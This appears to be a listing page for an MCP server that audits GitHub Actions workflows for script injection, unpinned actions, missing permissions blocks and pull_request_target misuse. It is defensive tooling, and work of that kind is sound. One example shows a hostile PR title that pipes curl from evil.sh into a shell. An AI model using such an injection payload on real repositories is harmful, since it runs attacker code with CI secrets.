github-actions-audit-mcp
Audits GitHub Actions workflow YAML files for security vulnerabilities, including script injection, unpinned third-party actions, missing permissions blocks, and dangerous pull_request_target usage, and returns findings with fixes.
Click on "Deploy Server".
Wait a few minutes for the server to deploy. Once ready, it will show a "Started" state.
In the chat, type
@followed by the MCP server name and your instructions, e.g., "@github-actions-audit-mcpaudit .github/workflows/ci.yml for script injection and unpinned actions"
That's it! The server will respond to your query, and you can continue using it as needed.
Here is a step-by-step guide with screenshots.
github-actions-audit-mcp
An MCP server that audits GitHub Actions workflow YAML for the real vulnerability classes that have caused actual incidents — not a linter, a security scanner. Parses genuine YAML structure (a hand-written block parser scoped to what workflow files actually use), not string/regex matching against the raw file.
What it catches
Script injection. Any ${{ github.event.issue.title }}-style expression that carries attacker-controlled text
(issue/PR titles, comments, review bodies, branch names) interpolated directly into a run: shell step. The
expression is substituted into the generated shell script before the shell runs it — a PR titled "; curl evil.sh | sh # becomes literal shell syntax, not a string. This is the single most common real-world GitHub Actions
vulnerability. Flags the exact expression and shows the env-variable fix that actually neutralizes it.
Unpinned third-party actions. uses: some-action@v4 or @main can be repointed by whoever controls that
tag/branch, without you changing a single character in your workflow file — this is exactly what happened in the
tj-actions/changed-files compromise (March 2025), where a maintainer's
PAT was used to retag v35–v46 to point at a credential-harvesting commit. Only a full 40-character commit SHA is
immutable.
Missing permissions: blocks. No explicit permissions: means the GITHUB_TOKEN defaults to whatever your
repo/org settings allow — often read-write. If any step is ever compromised, it inherits that full scope.
pull_request_target + head checkout. This trigger runs with the base repo's secrets and a write-scoped token
(unlike plain pull_request), and if the workflow also checks out the PR's own head commit, a fork's PR can run
arbitrary code with your secrets. Real supply-chain incidents follow this exact pattern.
Related MCP server: agentguard
Tools
audit_workflow
Full audit of a workflow YAML file. Returns a risk level and every finding with its exact location, why it's dangerous, and a concrete fix.
check_expression_injection
Focused check on a single shell command string, for when you just want to sanity-check one run: step without a
full workflow file.
Use it
Hosted (recommended): MCPize — free tier, $7/mo Pro.
Self-host:
npm install
node server.jsPart of a small suite
regex-safety-audit-mcp, mcp-trust-audit-mcp, secrets-leak-audit-mcp, dockerfile-audit-mcp.
License
MIT
This server cannot be deployed
Maintenance
Related MCP Connectors
GitHub Actions workflow security audit - 21 checks: pinning, permissions, secrets, injection.
Screens public GitHub repos and PRs to generate risk maps, findings, and merge-readiness signals.
Detects database migration table locks, terraform cost leaks, and OWASP API flaws.
Four IaC audits in one call: Compose, Dockerfile, GitHub Actions, Kubernetes. 131 checks.
Related MCP Servers
- AlicenseAqualityCmaintenanceLocal-only GitHub Actions and CI maintenance scanner for AI-built apps. Exposes scan, explanation, and fix-planning tools to MCP clients; modifies nothing and makes no outbound requests by default.339 npm2MIT
- AlicenseNot gradedqualityAmaintenanceEnables scanning of AI agent code for security vulnerabilities such as prompt injection, tool abuse, and data exfiltration, directly from MCP-compatible clients like Claude Code.2LGPL 3.0
- AlicenseNot gradedqualityAmaintenanceEnables AI agents to scan code for security and quality issues and receive machine-readable reports with suggested fixes and verification criteria.136 npm2MIT
- FlicenseNot gradedqualityDmaintenanceAudits GitHub Actions workflow files for supply-chain risks like script injection, leaked tokens, unpinned actions, and broad permissions.-